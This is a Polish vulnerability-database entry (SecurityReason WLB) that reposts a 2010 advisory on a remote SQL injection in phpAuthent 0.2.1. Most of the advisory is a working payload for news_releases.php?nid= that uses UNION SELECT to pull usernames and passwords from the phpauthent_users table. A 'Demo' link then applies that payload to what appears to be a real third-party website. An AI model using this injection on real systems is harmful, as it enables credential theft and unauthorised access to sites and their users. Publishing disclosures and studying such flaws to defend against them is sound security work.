Bezpieczeństwo informacji

, Wiadomości IT, Audyt bezpieczeństwa
Rejestracja | Zapomniałem hasła | Zaloguj się
Polski Polski  Angielski Angielski
Szukaj :
SecurityReason
WLB
Audyt
RSS
Zespół
Informacja

Jeśli znalazłeś interesujący błąd i chcesz go nam wysłać, użyj adresu:
secalert(.)securityreason(.)pl

Twój exploit może być opublikowany w dziale ExploitAlert. Wyślij go nam na adres:
exploit(.)securityreason(.)pl

Strona główna arrow Baza WLB          

  Tytuł : phpAuthent 0.2.1 remote SQL injection
  WLB : WLB-2010030086  (Szczegóły)
  Data publikacji : 2010-03-20
  Autor          : Gamoscu
  Poziom ryzyka : Średni  Poziom Średni  (Szczegóły)
  Zdalny błąd : Tak
  Lokalny błąd : Nie
  Status   : Bład

  Historia :
[2010-03-20] Publikacja

  Podatne oprogramowanie :  

phpAuthent version 0.2.1


  Tekst :  

phpAuthent 0.2.1 SQL Injection Vulnerability

###########################

Author : Gamoscu

Homepage : http://www.1923turk.com

Blog : http://gamoscu.wordpress.com/

Script : phpAuthent http://phpauth.sourceforge.net/

Download : http://phpauth.sourceforge.net/download.php

###########################

[ Vulnerable File ]

news_releases.php?nid= [ SQL ]


[ XpL ]

-1+union+select+1,2,3,username,password,6,7+from+phpauthent_users


[ Demo]


http://www.nok4444444444444444444444ers.com/news_releases.php?nid=-1+union+
select+1,2,3,username,password,6,7+from+phpauthent_users

  Referencje :  

None


Jeżeli chcesz zmienić powyższą note, prosze użyj UCP


Apache rss
PHP rss
Patronat

Szkolenia ISecMan

ISecMan

Szkolenia Multitrain

Multitrain

Copyright © SecurityReason. All Rights Reserved.